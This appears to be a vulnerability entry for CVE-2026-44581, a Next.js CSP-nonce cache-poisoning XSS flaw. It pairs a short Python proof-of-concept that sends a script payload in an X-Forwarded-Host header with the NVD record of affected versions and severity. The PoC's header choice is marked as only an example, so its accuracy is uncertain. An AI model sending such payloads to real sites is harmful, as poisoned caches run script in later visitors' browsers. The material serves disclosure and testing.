CVE-2026-44581

import requests # PoC for CVE-2026-44581: Next.js Cache Poisoning via Malformed Nonce # Description: Attempts to inject a malformed nonce header to poison the cache. target_url = "http://vulnerable-nextjs-app.com/api/page" # The attacker sends a request with a header that causes a malformed nonce generation # which is then reflected unsafely in the HTML. malicious_headers = { "User-Agent": "PoC-Client/1.0", "X-Forwarded-Host": "<script>alert(1)</script>", # Example header influencing nonce/logic "Accept-Encoding": "gzip, deflate" } try: print(f"[*] Sending payload to {target_url}...") response = requests.get(target_url, headers=malicious_headers) # Check if the payload is reflected in the response (potential cache poisoning) if "<script>alert(1)</script>" in response.text: print("[+] Potential vulnerability triggered! Payload reflected in response.") print("[+] Cache might be poisoned. Subsequent users may be affected.") else: print("[-] Payload not reflected.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-44581", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:18.400", "lastModified": "2026-05-14T18:30:24.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "13.4.0", "versionEndExcluding": "15.5.16", "matchCriteriaId": "A9F82F11-CD68-440C-AFAE-98AF7B8DB69F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.2.5", "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"}]}]}], "references": [{"url": "https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}